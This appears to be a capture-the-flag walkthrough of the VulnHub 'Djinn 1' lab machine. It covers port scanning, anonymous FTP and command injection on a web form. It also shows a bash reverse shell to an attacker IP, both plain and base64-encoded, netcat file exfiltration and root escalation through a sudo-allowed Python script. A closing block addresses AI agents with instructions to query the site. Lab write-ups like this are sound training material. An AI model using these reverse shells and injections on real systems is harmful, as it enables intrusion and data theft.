# Djinn 1 ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/djinn 192.168.1.110 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT Nmap scan report for 192.168.1.110 Host is up (0.00015s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.113 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh MAC Address: 00:0C:29:3A:97:CE (VMware) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds ``` ``` nmap -p- -Pn 192.168.1.110 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT Nmap scan report for 192.168.1.110 Host is up (0.00066s latency). Not shown: 65531 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp filtered ssh 1337/tcp open waste 7331/tcp open swx MAC Address: 00:0C:29:3A:97:CE (VMware) Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds ``` We can see here we have 2 more ports, `1337` and `7331`. ### FTP We can see that it has anonymous login. Let's try that ``` ftp 192.168.1.110 ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wbeiOFMwb2sTX2vj6%2Fimage.png?alt=media\&token=6aeefb68-6373-4d71-8e46-d3ed6cf02ed8) Then, we can list all the directories using `ls` command ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wboqczKhe1yTRRMCk%2Fimage.png?alt=media\&token=cd52d6b2-744c-4e97-b5df-885d83c659f3) We can see that there are 3 files inside. Let's use `get` command to get those 3 files ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wc6Na7-EFRS7fMHrY%2Fimage.png?alt=media\&token=5b7f4383-0e04-4f5c-86e7-c56e472f52d9) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wcDLL0x_S_1wqd0H5%2Fimage.png?alt=media\&token=e1b32b83-7e55-4391-83b7-85892631cc9e) We can see that the content inside these 3 files ### More Discovery We can see that there is port 1337 that we just discovered just now, let's head to the browser ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wca_uj8wFA8jznX_2%2Fimage.png?alt=media\&token=55c81dad-12c9-471b-8b1c-617c7a93d83a) Let's use `netcat` to get access ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wd5r5COnR3QSzhHO6%2Fimage.png?alt=media\&token=09aa1f6f-b0b9-47dc-9248-2499660bedfe) Answer 1000 times and I don't think he will give us our gift so let's move on to another port, port 7331. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wdVVxxZ3QBblG41HP%2Fimage.png?alt=media\&token=e61714d5-9374-4968-a22d-15e41dc131bd) ### gobuster Lets use gobuster to enumerate the URL since we can't find any things interesting inside the site. ``` gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/ ``` ``` =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.110:7331/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/22 11:05:12 Starting gobuster =============================================================== /genie (Status: 200) /wish (Status: 200) =============================================================== 2020/05/22 11:06:02 Finished =============================================================== ``` We can see that there are 2 directory that is `/genie` and `/wish`. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x13ZIMfJ-Uh-fWJiz%2Fimage.png?alt=media\&token=ed3d3a09-9629-4053-a264-76ed9d9e4f1e) Let's navigate to `/wish` page Type `id` then we will get the response from it ### Reverse Shell But when I set up a listener at my kali machine and type ``` nc -e /bin/bash 192.168.1.113 444 ``` It doesn't work that way, after that we actually need to encode using `base64` and use pipe command to decode it and let it execute. But then no luck too, we need to use bash reverse shell only can work ``` bash -i >& /dev/tcp/192.168.1.113/4444 0>&1 ``` We then go to this [website](https://www.base64encode.org/) and encode it with base64 Then, we can go to our `/wish` and type this ``` echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x5Em0UKtjkzr8OmBh%2Fimage.png?alt=media\&token=114657b2-871f-4c55-9e50-4019e94b85b4) We can first type this to ensure we get a proper shell ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` Then we can list out the directory and cat into `app.py` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x5nvJap9yubc8qwx8%2Fimage.png?alt=media\&token=9bc663eb-fcde-418e-87a2-fec2992a867d) Then we cat cat out the credentials. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x6R49G4GZpdOYhgPj%2Fimage.png?alt=media\&token=adf443ca-767c-49a1-bc18-5bcc82ca78a1) We can `su` to the user `nitish` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x7Tx2LIJcklIEemsh%2Fimage.png?alt=media\&token=7628a7dc-1a89-491f-af78-790d06e647d6) ## Privilege Escalation We then type `sudo -l` then we got this ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x83QkEfTfST2Yu3lK%2Fimage.png?alt=media\&token=7f9d203b-c9c7-4501-86a4-4922966c0dec) We can use `strings` command to list out all readable strings from the genie file ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zX4nqkQlRaejllmym%2F-M7zYkJMK9BwBwl7c5XF%2Fimage.png?alt=media\&token=5aeafa58-557b-4663-b023-211f10e4608d) We can see there is a `-cmd` paramter which can be apply. After playing around we can go to `sam` user by typing ``` sudo -u sam genie -cmd new ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x9jQOzs_BGUENF2rQ%2Fimage.png?alt=media\&token=a1d5ff0a-dc02-4fab-acce-1c2e68e6b98c) We then type `sudo -l` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x9rOIbEpnaiT3Aps7%2Fimage.png?alt=media\&token=8e69dfe8-247f-452b-b7bf-c9ac372238aa) If we run sudo /root/lago it will show us this ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zYxRsEZbrZuMtDEws%2F-M7zyX_EkOaO2bIfxgmo%2Fimage.png?alt=media\&token=b5ee3750-7dea-4eac-9c6a-a0f90ed00421) If we enter all the choices we still can't get through the selection. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zYxRsEZbrZuMtDEws%2F-M7zyhpRpaORI3YhmiDY%2Fimage.png?alt=media\&token=20192353-45e7-4ffb-b7f0-9ca4910a68ef) So, we can navigate to the `/home/sam` directory to find out more When we type `ls -la` then it will show us hidden files ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zYxRsEZbrZuMtDEws%2F-M7zyKUt9vydF8xkjkaY%2Fimage.png?alt=media\&token=1745c201-79a4-4778-8224-26a35c9c3590) Then we can use netcat to transfer files to our machine Our machine ``` nc -nlvp 9000 > abc.pyc ``` Target machine ``` nc -nv 192.168.1.113 9000 < .pyc ``` pyc is actually compiled file of python files. We can use uncompyle6 to decompile to see the source file of it. ``` uncompyle6 abc.txt ``` ``` # uncompyle6 version 3.7.0 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) # [GCC 9.3.0] # Embedded file name: /home/mzfr/scripts/exp.py # Compiled at: 2019-11-07 08:05:18 from getpass import getuser from os import system from random import randint def naughtyboi(): print 'Working on it!! ' def guessit(): num = randint(1, 101) print 'Choose a number between 1 to 100: ' s = input('Enter your number: ') if s == num: system('/bin/sh') else: print 'Better Luck next time' def readfiles(): user = getuser() path = input('Enter the full of the file to read: ') print 'User %s is not allowed to read %s' % (user, path) def options(): print 'What do you want to do ?' print '1 - Be naughty' print '2 - Guess the number' print '3 - Read some damn files' print '4 - Work' choice = int(input('Enter your choice: ')) return choice def main(op): if op == 1: naughtyboi() elif op == 2: guessit() elif op == 3: readfiles() elif op == 4: print 'work your ass off!!' else: print 'Do something better with your life' if __name__ == '__main__': main(options()) # okay decompiling abc.pyc ``` We can see that if input is `num` then we will able to get root! After that type `sudo -u root /root/lago` Then choose the number 2 and type `num` when it prompt to let us choose 1 - 100 ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7xAYiyGmMsdlqUZU-a%2Fimage.png?alt=media\&token=ff6a2696-9ea2-4a9b-95ad-d65db37b5469) Got root ! We then navigate to `/root` directory to get the flag ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7xAgaA9oIC5jKhs_G_%2Fimage.png?alt=media\&token=13b07a01-9dda-4167-b1b5-c619de255470) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/djinn-1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.